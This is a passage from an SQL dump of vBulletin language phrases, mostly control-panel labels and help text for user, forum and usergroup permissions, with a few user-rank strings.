(33459, -1, 'can_edit_own_user_notes', 'cppermission', 'Can Manage Own User NotesNotes that this user has posted, for self or others. This will override the above manage permissions, if enabled. ', 'vbulletin', '', 0, ''),
(33460, -1, 'can_edit_own_visitor_messages', 'cppermission', 'Can Edit Own Visitor Messages', 'vbulletin', 'vBulletin Solutions', 1197370777, '3.7.0 Beta 1'),
(33461, -1, 'can_edit_picture_comments', 'cppermission', 'Can Edit Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169775, '3.7.0 Beta 1'),
(33462, -1, 'can_edit_polls', 'cppermission', 'Can Edit Polls', 'vbulletin', '', 0, ''),
(33463, -1, 'can_edit_posts', 'cppermission', 'Can Edit Posts', 'vbulletin', '', 0, ''),
(33464, -1, 'can_edit_privacy', 'cppermission', 'Can Edit Profile PrivacyWhether the user can hide blocks on their profile page from other users ', 'vbulletin', 'vBulletin Solutions', 1229336470, '3.8.0 Release Candidate 2'),
(33465, -1, 'can_edit_social_groups', 'cppermission', 'Can Edit Social Groups', 'vbulletin', 'vBulletin Solutions', 1192710040, '3.7.0 Beta 1'),
(33466, -1, 'can_edit_threads', 'cppermission', 'Can Edit Threads', 'vbulletin', '', 0, ''),
(33467, -1, 'can_edit_user_avatars', 'cppermission', 'Can Edit User Avatars', 'vbulletin', '', 0, ''),
(33468, -1, 'can_edit_user_profile_pictures', 'cppermission', 'Can Edit User Profile Pictures', 'vbulletin', '', 0, ''),
(33469, -1, 'can_edit_user_reputation_comments', 'cppermission', 'Can Edit User Reputation Comments', 'vbulletin', '', 0, ''),
(33470, -1, 'can_edit_user_signatures', 'cppermission', 'Can Edit User Signatures', 'vbulletin', '', 0, ''),
(33471, -1, 'can_email_members', 'cppermission', 'Can Email Members', 'vbulletin', 'vBulletin Solutions', 1145031848, '3.6.0 Beta 1'),
(33472, -1, 'can_give_arbitrary_infractions', 'cppermission', 'Can Give Arbitrary Value Infractions', 'vbulletin', 'vBulletin Solutions', 1149878307, '3.6.0 Beta 2'),
(33473, -1, 'can_give_infractions', 'cppermission', 'Can Give Infractions to Others', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33474, -1, 'can_have_album', 'cppermission', 'Can Have Album and Upload Pictures', 'vbulletin', 'vBulletin Solutions', 1191938607, '3.7.0 Beta 1'),
(33475, -1, 'can_hide_reputation', 'cppermission', 'Can Hide Reputation from Others', 'vbulletin', '', 0, ''),
(33476, -1, 'can_ignore_quota', 'cppermission', 'Can send PMs to users who have reached their quota and/or disabled PMs', 'vbulletin', 'vBulletin Solutions', 1229013233, '3.8.6'),
(33477, -1, 'can_join_social_groups', 'cppermission', 'Can Join Social Groups', 'vbulletin', 'vBulletin Solutions', 1193767013, '3.7.0 Beta 1'),
(33478, -1, 'can_leave_negative_reputation', 'cppermission', 'Can Leave Negative Reputation', 'vbulletin', '', 0, ''),
(33479, -1, 'can_limit_discussion', 'cppermission', 'Can Limit Discussions in Own Groups to the Group OwnerIf enabled, the user can configure their social groups so that only they can create new discussions. ', 'vbulletin', 'vBulletin Solutions', 1210938314, '3.7.1'),
(33480, -1, 'can_manage_comments_own_pictures', 'cppermission', 'Can Manage Comments on Own Pictures', 'vbulletin', 'vBulletin Solutions', 1198152745, '3.7.0 Beta 1'),
(33481, -1, 'can_manage_group_discussions', 'cppermission', 'Can Manage Own Discussions', 'vbulletin', 'vBulletin Solutions', 1212052825, '3.7.1'),
(33482, -1, 'can_manage_group_messages', 'cppermission', 'Can Manage Own Messages', 'vbulletin', 'vBulletin Solutions', 1211993737, '3.7.1'),
(33483, -1, 'can_manage_others_user_notes', 'cppermission', 'Can Manage User Notes About Others', 'vbulletin', '', 0, ''),
(33484, -1, 'can_manage_own_social_groups', 'cppermission', 'Can Manage Own Social Groups', 'vbulletin', 'vBulletin Solutions', 1204111309, '3.7.0 Beta 6'),
(33485, -1, 'can_manage_own_user_notes', 'cppermission', 'Can Manage User Notes About Self', 'vbulletin', '', 0, ''),
(33486, -1, 'can_manage_own_visitor_messages', 'cppermission', 'Can Manage Messages within Own Profile', 'vbulletin', 'vBulletin Solutions', 1197370784, '3.7.0 Beta 1'),
(33487, -1, 'can_manage_threads', 'cppermission', 'Can Manage Threads', 'vbulletin', '', 0, ''),
(33488, -1, 'can_mass_move_threads', 'cppermission', 'Can Mass-Move Threads', 'vbulletin', '', 0, ''),
(33489, -1, 'can_mass_prune_threads', 'cppermission', 'Can Mass-Prune Threads', 'vbulletin', '', 0, ''),
(33490, -1, 'can_moderate_attachments', 'cppermission', 'Can Moderate Attachments', 'vbulletin', '', 0, ''),
(33491, -1, 'can_moderate_discussions', 'cppermission', 'Can Moderate Discussions', 'vbulletin', 'vBulletin Solutions', 1212054407, '3.7.1'),
(33492, -1, 'can_moderate_events', 'cppermission', 'Can Moderate Events', 'vbulletin', '', 0, ''),
(33493, -1, 'can_moderate_picture_comments', 'cppermission', 'Can Moderate Picture Comments', 'vbulletin', 'vBulletin Solutions', 1198169046, '3.7.0 Beta 1'),
(33494, -1, 'can_moderate_pictures', 'cppermission', 'Can Moderate Pictures', 'vbulletin', 'vBulletin Solutions', 1203548998, '3.7.0 Beta 6'),
(33495, -1, 'can_moderate_posts', 'cppermission', 'Can Moderate Posts', 'vbulletin', '', 0, ''),
(33496, -1, 'can_move_events', 'cppermission', 'Can Move Events', 'vbulletin', '', 0, ''),
(33497, -1, 'can_move_own_threads', 'cppermission', 'Can Move Own Threads', 'vbulletin', '', 0, ''),
(33498, -1, 'can_open_close_own_threads', 'cppermission', 'Can Open / Close Own Threads', 'vbulletin', '', 0, ''),
(33499, -1, 'can_open_close_threads', 'cppermission', 'Can Open / Close Threads', 'vbulletin', '', 0, ''),
(33500, -1, 'can_override_primary_group_title', 'cppermission', 'Can override primary group title/markup', 'vbulletin', '', 0, ''),
(33501, -1, 'can_physically_delete_discussions', 'cppermission', 'Can Physically Delete Discussions (Completely removes the discussion and all of it\'s posts from the database) ', 'vbulletin', 'vBulletin Solutions', 1211464654, '3.7.1'),
(33502, -1, 'can_physically_delete_posts', 'cppermission', 'Can Physically Delete Posts (Completely removes the post from the database) ', 'vbulletin', '', 0, ''),
(33503, -1, 'can_post_announcements', 'cppermission', 'Can Post Announcements\r\nGranting this permission will allow this user to post announcements containing arbitrary HTML. ', 'vbulletin', 'vBulletin Solutions', 1219837672, '3.8.0 Alpha 1'),
(33504, -1, 'can_post_attachments', 'cppermission', 'Can Post Attachments', 'vbulletin', '', 0, ''),
(33505, -1, 'can_post_events', 'cppermission', 'Can Post Events', 'vbulletin', '', 0, ''),
(33506, -1, 'can_post_group_message', 'cppermission', 'Can Post Messages in Groups', 'vbulletin', 'vBulletin Solutions', 1210937630, '3.7.1'),
(33507, -1, 'can_post_polls', 'cppermission', 'Can Post Polls', 'vbulletin', '', 0, ''),
(33508, -1, 'can_post_threads', 'cppermission', 'Can Post Threads', 'vbulletin', '', 0, ''),
(33509, -1, 'can_post_user_notes_about_others', 'cppermission', 'Can Post User Notes About Others', 'vbulletin', '', 0, ''),
(33510, -1, 'can_post_user_notes_about_self', 'cppermission', 'Can Post User Notes About Self', 'vbulletin', '', 0, ''),
(33511, -1, 'can_post_visitor_messages_to_others_profile', 'cppermission', 'Can Post Visitor Messages to Others\' Profile', 'vbulletin', 'vBulletin Solutions', 1197370809, '3.7.0 Beta 1'),
(33512, -1, 'can_post_visitor_messages_to_own_profile', 'cppermission', 'Can Post Visitor Messages to Own Profile', 'vbulletin', 'vBulletin Solutions', 1197370821, '3.7.0 Beta 1'),
(33513, -1, 'can_rate_threads', 'cppermission', 'Can Rate Threads', 'vbulletin', '', 0, ''),
(33514, -1, 'can_remove_picture_comments', 'cppermission', 'Can Physically Delete Picture Comments\r\n(Completely removes the comment from the database) ', 'vbulletin', 'vBulletin Solutions', 1198169989, '3.7.0 Beta 1'),
(33515, -1, 'can_reply_to_others_threads', 'cppermission', 'Can Reply to Others\' Threads', 'vbulletin', '', 0, ''),
(33516, -1, 'can_reply_to_own_threads', 'cppermission', 'Can Reply to Own Threads', 'vbulletin', '', 0, ''),
(33517, -1, 'can_restore_banned_users', 'cppermission', 'Can Restore Banned Users', 'vbulletin', '', 0, ''),
(33518, -1, 'can_reverse_infractions', 'cppermission', 'Can Reverse Infractions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33519, -1, 'can_run_maintenance', 'cppermission', 'Can Run Maintenance Tools', 'vbulletin', '', 0, ''),
(33520, -1, 'can_search_forum', 'cppermission', 'Can Search Forum', 'vbulletin', '', 0, ''),
(33521, -1, 'can_search_forums', 'cppermission', 'Can Search Forums', 'vbulletin', '', 0, ''),
(33522, -1, 'can_see_deletion_notices', 'cppermission', 'Can See Deletion Notices', 'vbulletin', '', 0, ''),
(33523, -1, 'can_see_invisible_users', 'cppermission', 'Can \'See\' Users Who Have Chosen to be Invisible While Online', 'vbulletin', '', 0, ''),
(33524, -1, 'can_see_others_infraction_level', 'cppermission', 'Can See Others\' Infraction Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33525, -1, 'can_see_rep_left_for_others', 'cppermission', 'Can See Reputation Left for Others', 'vbulletin', '', 0, ''),
(33526, -1, 'can_see_thumbnails', 'cppermission', 'Can See Thumbnails', 'vbulletin', 'vBulletin Solutions', 1219764429, '3.8.0 Alpha 1'),
(33527, -1, 'can_see_who_left_user_ratings', 'cppermission', 'Can See Who Left User Ratings', 'vbulletin', '', 0, ''),
(33528, -1, 'can_set_forum_password', 'cppermission', 'Can Set Forum Password', 'vbulletin', '', 0, ''),
(33529, -1, 'can_set_self_invisible', 'cppermission', 'Can Set Self to Invisible Mode', 'vbulletin', '', 0, ''),
(33530, -1, 'can_tag_others_threads', 'cppermission', 'Can Tag Others\' Threads', 'vbulletin', 'vBulletin Solutions', 1190300991, '3.7.0 Beta 1'),
(33531, -1, 'can_tag_own_threads', 'cppermission', 'Can Tag Own Threads', 'vbulletin', 'vBulletin Solutions', 1190300980, '3.7.0 Beta 1'),
(33532, -1, 'can_transfer_social_groups', 'cppermission', 'Can Transfer Social Groups', 'vbulletin', 'vBulletin Solutions', 1221142239, '3.8.0 Alpha 1'),
(33533, -1, 'can_upload_ani_gif_sig_img', 'cppermission', 'Can Upload Animated GIF for Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33534, -1, 'can_upload_animated_avatar', 'cppermission', 'Can Upload Animated Avatar', 'vbulletin', '', 0, ''),
(33535, -1, 'can_upload_animated_group_icon', 'cppermission', 'Can Upload Animated Group Icons', 'vbulletin', 'vBulletin Solutions', 1216129879, '3.8.0 Alpha 1'),
(33536, -1, 'can_upload_animated_profile_picture', 'cppermission', 'Can Upload Animated Profile Picture', 'vbulletin', '', 0, ''),
(33537, -1, 'can_upload_attachments', 'cppermission', 'Can Upload Attachments', 'vbulletin', '', 0, ''),
(33538, -1, 'can_upload_custom_avatars', 'cppermission', 'Can Upload Custom Avatars', 'vbulletin', '', 0, ''),
(33539, -1, 'can_upload_profile_pictures', 'cppermission', 'Can Upload Profile Pictures', 'vbulletin', '', 0, ''),
(33540, -1, 'can_upload_sig_img', 'cppermission', 'Can Upload Images for Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33541, -1, 'can_upload_social_group_icon', 'cppermission', 'Can Upload Social Group Icons', 'vbulletin', 'vBulletin Solutions', 1216129807, '3.8.0 Alpha 1'),
(33542, -1, 'can_use_boolean_search', 'cppermission', 'Can Use Boolean Search(Only applies if Fulltext searching is enabled) ', 'vbulletin', '', 0, ''),
(33543, -1, 'can_use_custom_title', 'cppermission', 'Can Use Custom Title', 'vbulletin', '', 0, ''),
(33544, -1, 'can_use_email_to_friend', 'cppermission', 'Can Use Email to Friend', 'vbulletin', '', 0, ''),
(33545, -1, 'can_use_friends', 'cppermission', 'Can Use Friends List', 'vbulletin', 'vBulletin Solutions', 1195753761, '3.7.0 Beta 1'),
(33546, -1, 'can_use_message_tracking', 'cppermission', 'Can Use Message Tracking', 'vbulletin', '', 0, ''),
(33547, -1, 'can_use_reputation', 'cppermission', 'Can Use Reputation', 'vbulletin', '', 0, ''),
(33548, -1, 'can_use_signatures', 'cppermission', 'Can Use Signatures', 'vbulletin', '', 0, ''),
(33549, -1, 'can_view_albums', 'cppermission', 'Can View Albums\r\nUsers without this permission will still be able to see picture in public and profile album if they know the exact URL. ', 'vbulletin', 'vBulletin Solutions', 1199405074, '3.7.0 Beta 4'),
(33550, -1, 'can_view_attachments', 'cppermission', 'Can View Attachments', 'vbulletin', '', 0, ''),
(33551, -1, 'can_view_calendar', 'cppermission', 'Can View Calendar', 'vbulletin', '', 0, ''),
(33552, -1, 'can_view_forum', 'cppermission', 'Can View Forum', 'vbulletin', '', 0, ''),
(33553, -1, 'can_view_hidden_custom_fields', 'cppermission', 'Can View Private Custom Fields', 'vbulletin', '', 0, ''),
(33554, -1, 'can_view_ip_addresses', 'cppermission', 'Can View IP Addresses', 'vbulletin', '', 0, ''),
(33555, -1, 'can_view_member_info', 'cppermission', 'Can View Member Info', 'vbulletin', '', 0, ''),
(33556, -1, 'can_view_others_events', 'cppermission', 'Can View Others\' Events', 'vbulletin', '', 0, ''),
(33557, -1, 'can_view_others_profile_pictures', 'cppermission', 'Can View Others\' Profile Pictures', 'vbulletin', '', 0, ''),
(33558, -1, 'can_view_others_threads', 'cppermission', 'Can View Others\' Threads', 'vbulletin', '', 0, ''),
(33559, -1, 'can_view_others_user_notes', 'cppermission', 'Can View User Notes About Others', 'vbulletin', '', 0, ''),
(33560, -1, 'can_view_own_user_notes', 'cppermission', 'Can View User Notes About Self', 'vbulletin', '', 0, ''),
(33561, -1, 'can_view_social_groups', 'cppermission', 'Can View Social Groups', 'vbulletin', 'vBulletin Solutions', 1193235877, '3.7.0 Beta 1'),
(33562, -1, 'can_view_threads', 'cppermission', 'Can View Thread Content', 'vbulletin', '', 0, ''),
(33563, -1, 'can_view_whole_profile', 'cppermission', 'Can View Whole User Profile (but not edit)', 'vbulletin', '', 0, ''),
(33564, -1, 'can_view_whos_online', 'cppermission', 'Can View Who\'s Online', 'vbulletin', '', 0, ''),
(33565, -1, 'can_view_wol_actual_location', 'cppermission', 'Can view actual location of user (filepath/url).', 'vbulletin', '', 0, ''),
(33566, -1, 'can_view_wol_bad_location', 'cppermission', 'Can View Detailed Location Info of Users Who Visit Bad / No Permission Locations', 'vbulletin', '', 0, ''),
(33567, -1, 'can_view_wol_detail_location', 'cppermission', 'Can View Detailed Location Info for Users', 'vbulletin', '', 0, ''),
(33568, -1, 'can_vote_on_polls', 'cppermission', 'Can Vote on Polls', 'vbulletin', '', 0, ''),
(33569, -1, 'control_panel_style_choice', 'cppermission', 'Control Panel Style Choice', 'vbulletin', '', 0, ''),
(33570, -1, 'copy_permissions_from_forum', 'cppermission', 'Copy Permissions from Forum (Does not include sub-forums) ', 'vbulletin', '', 0, ''),
(33571, -1, 'copy_permissions_from_group', 'cppermission', 'Copy Permissions from User Group', 'vbulletin', '', 0, ''),
(33572, -1, 'copy_permissions_to_forums', 'cppermission', 'Copy Permissions to Forums', 'vbulletin', '', 0, ''),
(33573, -1, 'copy_permissions_to_groups', 'cppermission', 'Copy Permissions to User Groups', 'vbulletin', '', 0, ''),
(33574, -1, 'custom_avatar_max_filesize', 'cppermission', 'Custom Avatar Maximum File Size (bytes)1KB = 1024 bytes ', 'vbulletin', '', 0, ''),
(33575, -1, 'custom_avatar_max_height', 'cppermission', 'Custom Avatar Maximum Height (pixels)', 'vbulletin', '', 0, ''),
(33576, -1, 'custom_avatar_max_width', 'cppermission', 'Custom Avatar Maximum Width (pixels)', 'vbulletin', '', 0, ''),
(33577, -1, 'custom_calendar_permissions', 'cppermission', 'Custom Calendar Permissions', 'vbulletin', '', 0, ''),
(33578, -1, 'customized_using_custom_permissions_for_this_usergroup', 'cppermission', 'Customized: Using custom permissions for this usergroup', 'vbulletin', '', 0, ''),
(33579, -1, 'default_forum_permissions', 'cppermission', 'Default Forum Permissions', 'vbulletin', '', 0, ''),
(33580, -1, 'delete_selected_permissions', 'cppermission', 'Delete Selected Permissions', 'vbulletin', '', 0, ''),
(33581, -1, 'deny_all', 'cppermission', 'Deny All', 'vbulletin', '', 0, ''),
(33582, -1, 'dismissed_news_item_ids', 'cppermission', 'Dismissed vBulletin News Item IDs', 'vbulletin', 'vBulletin Solutions', 1158158235, '3.6.1'),
(33583, -1, 'edit_forum_permissions', 'cppermission', 'Edit Forum Permissions', 'vbulletin', '', 0, ''),
(33584, -1, 'edit_forum_permissions_for_usergroup_x_in_forum_y', 'cppermission', 'Edit Forum Permissions For Usergroup: {1} in Forum {2}', 'vbulletin', '', 0, ''),
(33585, -1, 'events_are_unmoderated', 'cppermission', 'Posted Events are Not Moderated', 'vbulletin', '', 0, ''),
(33586, -1, 'follow_forum_moderation_rules', 'cppermission', 'Follow Forum Moderation RulesIf no, posts are always placed into moderation queue ', 'vbulletin', '', 0, ''),
(33587, -1, 'follow_group_message_moderation_rules', 'cppermission', 'Follow Social Group Message Moderation RulesIf no, messages are always placed into moderation queue ', 'vbulletin', 'vBulletin Solutions', 1195503890, '3.7.0 Beta 1'),
(33588, -1, 'follow_picture_comment_moderation_rules', 'cppermission', 'Follow Picture Comment Moderation Rules', 'vbulletin', 'vBulletin Solutions', 1198152759, '3.7.0 Beta 1'),
(33589, -1, 'follow_picture_moderation_rules', 'cppermission', 'Follow Picture Moderation Rules', 'vbulletin', 'vBulletin Solutions', 1203546022, '3.7.0 Beta 6'),
(33590, -1, 'follow_visitor_message_moderation_rules', 'cppermission', 'Follow Visitor Message Moderation RulesIf no, messages are always placed into moderation queue ', 'vbulletin', 'vBulletin Solutions', 1197370833, '3.7.0 Beta 1'),
(33591, -1, 'forum_based_permission_duplicator', 'cppermission', 'Forum-Based Permission Duplicator', 'vbulletin', '', 0, ''),
(33592, -1, 'forum_permissions', 'cppermission', 'Forum Permissions', 'vbulletin', '', 0, ''),
(33593, -1, 'forum_permissions_manager', 'cppermission', 'Forum Permissions Manager', 'vbulletin', '', 0, ''),
(33594, -1, 'forum_searching_permissions', 'cppermission', 'Forum Searching Permissions', 'vbulletin', '', 0, ''),
(33595, -1, 'forum_viewing_permissions', 'cppermission', 'Forum Viewing Permissions', 'vbulletin', '', 0, ''),
(33596, -1, 'general_permissions', 'cppermission', 'General Permissions', 'vbulletin', '', 0, ''),
(33597, -1, 'give_admin_access_arbitrary_html', 'cppermission', 'Giving a user administrative access will allow him or her to create announcements which may contain arbitrary HTML. Only grant this access if you trust this person.', 'vbulletin', 'vBulletin Solutions', 1178885193, '3.6.6'),
(33598, -1, 'inherited_using_custom_permissions_inherited_from_a_parent_forum', 'cppermission', 'Inherited: Using custom permissions inherited from a parent forum', 'vbulletin', '', 0, ''),
(33599, -1, 'is_banned_group', 'cppermission', 'This Usergroup is not a \'Banned\' Group (Setting this to no will cause the group to be treated as a banned group, this will prevent the sending of email notifications, show a banned error message on the permission error pages and other unspecified behaviors.) ', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33600, -1, 'is_super_moderator', 'cppermission', 'Can Moderate All Forums (is Super Moderator)', 'vbulletin', '', 0, ''),
(33601, -1, 'making_x_a_member_of_the_usergroup_y', 'cppermission', 'Making {1} a member of the usergroup {2}.', 'vbulletin', '', 0, ''),
(33602, -1, 'maximum_created_groups', 'cppermission', 'Maximum Created GroupsThe amount of groups the user can have at any one time. ', 'vbulletin', 'vBulletin Solutions', 1218709358, '3.8.0 Alpha 1'),
(33603, -1, 'maximum_recipients_to_send_pms', 'cppermission', 'Maximum Recipients to Send PMs at a time:Do not set this too high for performance reasons (set to 0 to allow unlimited recipients) ', 'vbulletin', 'vBulletin Solutions', 1201136609, '3.7.0 Beta 5'),
(33604, -1, 'maximum_stored_messages', 'cppermission', 'Maximum Stored Messages:If you set this to 0 users from this usergroup will not be able to use private messaging. ', 'vbulletin', '', 0, ''),
(33605, -1, 'message_throttle_quantity', 'cppermission', 'Message Throttle QuantityThis limits the amount of messages the user can send within the Throttle Check Period ', 'vbulletin', 'vBulletin Solutions', 1216394948, '3.8.0 Alpha 1'),
(33606, -1, 'must_enable_custom_permissions', 'cppermission', 'For this setting to have any effect, custom permissions for this usergroup must be enabled.', 'vbulletin', '', 0, ''),
(33607, -1, 'note_groups_marked_with_a_asterisk', 'cppermission', 'Note : Groups marked with an * can be selected by their members to override the username markup and user title from their primary usergroup.', 'vbulletin', 'vBulletin Solutions', 1150742730, '3.6.0 Beta 3'),
(33608, -1, 'only_copy_permissions_from_forum', 'cppermission', 'Only Copy Permissions from Forum (Includes sub-forums) ', 'vbulletin', '', 0, ''),
(33609, -1, 'only_copy_permissions_from_group', 'cppermission', 'Only Copy Permissions from User Group', 'vbulletin', '', 0, ''),
(33610, -1, 'order_by_forum', 'cppermission', 'Order By Forum', 'vbulletin', '', 0, ''),
(33611, -1, 'order_by_usergroup', 'cppermission', 'Order By Usergroup', 'vbulletin', '', 0, ''),
(33612, -1, 'other_users_can_be_posted', 'cppermission', 'User Notes Can Be Posted About This Group', 'vbulletin', '', 0, ''),
(33613, -1, 'overwrite_duplicate_entries', 'cppermission', 'Overwrite Duplicate Entries', 'vbulletin', '', 0, ''),
(33614, -1, 'overwrite_inherited_entries', 'cppermission', 'Overwrite Inherited Entries', 'vbulletin', '', 0, ''),
(33615, -1, 'password_expiry', 'cppermission', 'Password Expiry (If you specify a number of days here, users will be required to change their password when this amount of time elapsed since they last changed) ', 'vbulletin', '', 0, ''),
(33616, -1, 'password_history', 'cppermission', 'Password History (If you specify a number of days here, users will not be allowed to change their password to a value that they have used in the past x days. Note: this setting has no effect if password expiry is set to 0 days) ', 'vbulletin', '', 0, ''),
(33617, -1, 'permission_duplication_tools', 'cppermission', 'Permission Duplication Tools', 'vbulletin', '', 0, ''),
(33618, -1, 'permission_overwrite_notice', 'cppermission', 'Note: These permissions will overwrite any existing permissions for this forum for the selected usergroups', 'vbulletin', '', 0, ''),
(33619, -1, 'permissions', 'cppermission', 'Permissions', 'vbulletin', '', 0, ''),
(33620, -1, 'permissions_quick_editor', 'cppermission', 'Permissions Quick Editor', 'vbulletin', '', 0, ''),
(33621, -1, 'picture_uploading_permissions', 'cppermission', 'Picture Uploading Permissions', 'vbulletin', '', 0, ''),
(33622, -1, 'poll_permissions', 'cppermission', 'Poll Permissions', 'vbulletin', '', 0, ''),
(33623, -1, 'post_permissions', 'cppermission', 'Post Permissions', 'vbulletin', '', 0, ''),
(33624, -1, 'post_thread_permissions', 'cppermission', 'Post / Thread Permissions', 'vbulletin', '', 0, ''),
(33625, -1, 'private_message_permissions', 'cppermission', 'Private Message Permissions', 'vbulletin', '', 0, ''),
(33626, -1, 'profile_picture_max_filesize', 'cppermission', 'Profile Picture Maximum File Size (bytes)1KB = 1024 bytes ', 'vbulletin', '', 0, ''),
(33627, -1, 'profile_picture_max_height', 'cppermission', 'Profile Picture Maximum Height (pixels)', 'vbulletin', '', 0, ''),
(33628, -1, 'profile_picture_max_width', 'cppermission', 'Profile Picture Maximum Width (pixels)', 'vbulletin', '', 0, ''),
(33629, -1, 'quick_forum_permission_setup', 'cppermission', 'Quick Forum Permission Setup', 'vbulletin', '', 0, ''),
(33630, -1, 'require_hv_check', 'cppermission', 'Require Human Verification on Configured Actions\r\nUsers will have to pass human verification for the configured Human Verified Actions .', 'vbulletin', 'vBulletin Solutions', 1216636796, '3.8.0 Alpha 1'),
(33631, -1, 'show_edited_by_note_on_edited_messages', 'cppermission', 'Show edited by note on edited messages?', 'vbulletin', '', 0, ''),
(33632, -1, 'sig_image_max_filesize', 'cppermission', 'Signature Image Maximum Filesize (bytes)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33633, -1, 'sig_image_max_height', 'cppermission', 'Signature Image Maximum Height (pixels)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33634, -1, 'sig_image_max_width', 'cppermission', 'Signature Image Maximum Width (pixels)', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33635, -1, 'sig_max_chars', 'cppermission', 'Maximum Characters in Signature Excluding BB Code Markup', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33636, -1, 'sig_max_images', 'cppermission', 'Maximum Number of Images in Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33637, -1, 'sig_max_lines', 'cppermission', 'Maximum Lines in Signature', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33638, -1, 'sig_max_raw_chars', 'cppermission', 'Maximum Characters in Signature Including BB Code Markup', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33639, -1, 'sig_max_size_bbcode', 'cppermission', 'Maximum Value of x for [SIZE=x] BB Code', 'vbulletin', 'vBulletin Solutions', 1205493460, '3.7.0 Release Candidate 1'),
(33640, -1, 'signature_permissions', 'cppermission', 'Signature Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33641, -1, 'social_group_icon_max_size', 'cppermission', 'Maximum File Size of Social Group Icons (bytes) \r\nNote: Social Group Image Icons are always limited to 200px by 200px. ', 'vbulletin', 'vBulletin Solutions', 1216910617, '3.8.0 Alpha 1'),
(33642, -1, 'social_group_permissions', 'cppermission', 'Social Groups Permissions', 'vbulletin', 'vBulletin Solutions', 1192546547, '3.7.0 Beta 1'),
(33643, -1, 'space_in_bytes_attachlimit', 'cppermission', 'Space (in bytes) that a user\'s total attachment usage may consume (Set to 0 to not have a limit) ', 'vbulletin', '', 0, ''),
(33644, -1, 'use_custom_permissions', 'cppermission', 'Use Custom Permissions', 'vbulletin', '', 0, ''),
(33645, -1, 'use_default_permissions', 'cppermission', 'Use Usergroup Default Permissions (Note: this will delete any previous custom permissions set)', 'vbulletin', '', 0, ''),
(33646, -1, 'user_album_permissions', 'cppermission', 'User Album Permissions', 'vbulletin', 'vBulletin Solutions', 1191938585, '3.7.0 Beta 1'),
(33647, -1, 'user_infraction_banning_level', 'cppermission', 'User Infraction Banning Level', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33648, -1, 'user_infraction_permissions', 'cppermission', 'User Infraction Permissions', 'vbulletin', 'vBulletin Solutions', 1142519066, '3.6.0 Beta 1'),
(33649, -1, 'user_note_permissions', 'cppermission', 'User Note Permissions', 'vbulletin', '', 0, ''),
(33650, -1, 'user_permissions', 'cppermission', 'User Permissions', 'vbulletin', '', 0, ''),
(33651, -1, 'user_reputation_permissions', 'cppermission', 'User Reputation Permissions', 'vbulletin', '', 0, ''),
(33652, -1, 'usercss_permissions', 'cppermission', 'Profile Customization Permissions', 'vbulletin', 'vBulletin Solutions', 1218464274, '3.8.0 Alpha 1'),
(33653, -1, 'usergroup_based_permission_duplicator', 'cppermission', 'User Group-Based Permission Duplicator', 'vbulletin', '', 0, ''),
(33654, -1, 'usergroup_user_title', 'cppermission', 'User Title (Use this to override the default \'ladder\' of user titles ) ', 'vbulletin', '', 0, ''),
(33655, -1, 'username_markup', 'cppermission', 'Username HTML Markup (Specify an opening and closing HTML tag with which to display the names of users in this group. This applies to names that appear on Logged-in Users, Who\'s Online, Users Browsing Forum, Users Browsing Thread, Posts, Member List etc.) ', 'vbulletin', '', 0, ''),
(33656, -1, 'view_control_panel_log', 'cppermission', 'View Control Panel Log', 'vbulletin', '', 0, ''),
(33657, -1, 'view_forum_permissions', 'cppermission', 'View Forum Permissions', 'vbulletin', '', 0, ''),
(33658, -1, 'view_permissions', 'cppermission', 'View Permissions', 'vbulletin', '', 0, ''),
(33659, -1, 'viewable_on_memberlist', 'cppermission', 'Viewable on the Memberlist (Sets whether or not users in this group will appear on the member list) ', 'vbulletin', '', 0, ''),
(33660, -1, 'viewable_on_showgroups', 'cppermission', 'Viewable on Show Groups (Sets whether or not to show members of this group on the \'View Forum Leaders \' page) ', 'vbulletin', '', 0, ''),
(33661, -1, 'visitor_message_permissions', 'cppermission', 'Visitor Message Permissions', 'vbulletin', 'vBulletin Solutions', 1197370859, '3.7.0 Beta 1'),
(33662, -1, 'whos_online_permissions', 'cppermission', 'Who\'s Online Permissions', 'vbulletin', '', 0, ''),
(33663, -1, 'x_access_masks_set', 'cppermission', '{1} Access Mask(s) set', 'vbulletin', '', 0, ''),
(33664, -1, 'x_is_already_a_member_of_the_usergroup_y', 'cppermission', '{1} is already a member of the usergroup {2}.', 'vbulletin', '', 0, ''),
(33665, -1, 'always', 'cprank', 'Always', 'vbulletin', '', 0, ''),
(33666, -1, 'are_you_sure_you_want_to_delete_this_user_rank', 'cprank', 'Are you sure you want to delete this User Rank?', 'vbulletin', '', 0, ''),
(33667, -1, 'display_type', 'cprank', 'Display Type', 'vbulletin', '', 0, ''),
(33668, -1, 'displaygroup', 'cprank', 'Displaygroup', 'vbulletin', '', 0, ''),
(33669, -1, 'if_displaygroup_equals_this_group', 'cprank', 'If Displaygroup = This Group', 'vbulletin', '', 0, ''),
(33670, -1, 'images', 'cprank', 'Images', 'vbulletin', '', 0, ''),
(33671, -1, 'or_you_may_enter_text', 'cprank', 'OR you may enter textHTML is allowed ', 'vbulletin', '', 0, ''),
(33672, -1, 'rank_type', 'cprank', 'Rank Type', 'vbulletin', '', 0, ''),
(33673, -1, 'stack_rank', 'cprank', 'Stack Rank', 'vbulletin', '', 0, ''),
(33674, -1, 'times_to_repeat_rank', 'cprank', 'Number of times to repeat rank:', 'vbulletin', '', 0, ''),
